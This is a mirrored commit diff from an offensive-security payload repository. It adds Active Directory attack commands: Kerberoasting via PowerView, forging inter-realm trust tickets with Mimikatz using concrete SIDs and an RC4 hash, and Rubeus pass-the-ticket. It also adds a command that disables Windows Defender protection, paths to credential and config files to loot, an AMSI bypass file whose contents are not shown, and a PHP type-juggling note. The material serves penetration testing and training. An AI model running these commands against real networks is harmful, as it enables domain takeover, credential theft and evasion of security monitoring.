mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 02:38:50 +00:00
AMSI + Trust
This commit is contained in:
parent
78cc68674b
commit
19a2950b8d
@ -1098,6 +1098,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
|
||||
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
|
||||
```
|
||||
|
||||
Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
|
||||
|
||||
```powershell
|
||||
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
|
||||
```
|
||||
|
||||
Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
|
||||
|
||||
```powershell
|
||||
@ -1605,6 +1611,9 @@ Prerequisite:
|
||||
|
||||
### Forest to Forest Compromise - Trust Ticket
|
||||
|
||||
From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
|
||||
Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
|
||||
|
||||
#### Dumping trust passwords (trust keys)
|
||||
|
||||
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts.
|
||||
@ -1619,12 +1628,14 @@ or find the TRUST_NAME$ machine account hash
|
||||
|
||||
```powershell
|
||||
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
|
||||
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
|
||||
```
|
||||
|
||||
#### Use the Trust Ticket file to get a TGS for the targeted service
|
||||
|
||||
```powershell
|
||||
./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
|
||||
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
|
||||
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
|
||||
```
|
||||
|
||||
Inject the TGS file and access the targeted service with the spoofed rights.
|
||||
|
735
Methodology and Resources/Windows - AMSI Bypass.md
Normal file
735
Methodology and Resources/Windows - AMSI Bypass.md
Normal file
File diff suppressed because one or more lines are too long
@ -249,6 +249,7 @@ PS C:\> Get-MpComputerStatus
|
||||
|
||||
# disable Real Time Monitoring
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||
```
|
||||
|
||||
### AppLocker Enumeration
|
||||
@ -426,6 +427,8 @@ C:\inetpub\wwwroot\web.config
|
||||
%USERPROFILE%\ntuser.dat
|
||||
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
||||
%WINDIR%\System32\drivers\etc\hosts
|
||||
C:\ProgramData\Configs\*
|
||||
C:\Program Files\Windows PowerShell\*
|
||||
dir c:*vnc.ini /s /b
|
||||
dir c:*ultravnc.ini /s /b
|
||||
```
|
||||
|
@ -7,6 +7,8 @@ PHP provides two ways to compare two variables:
|
||||
|
||||
PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.
|
||||
|
||||
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
|
||||
|
||||
## Type Juggling
|
||||
|
||||
### True statements
|
||||
|
Loading…
Reference in New Issue
Block a user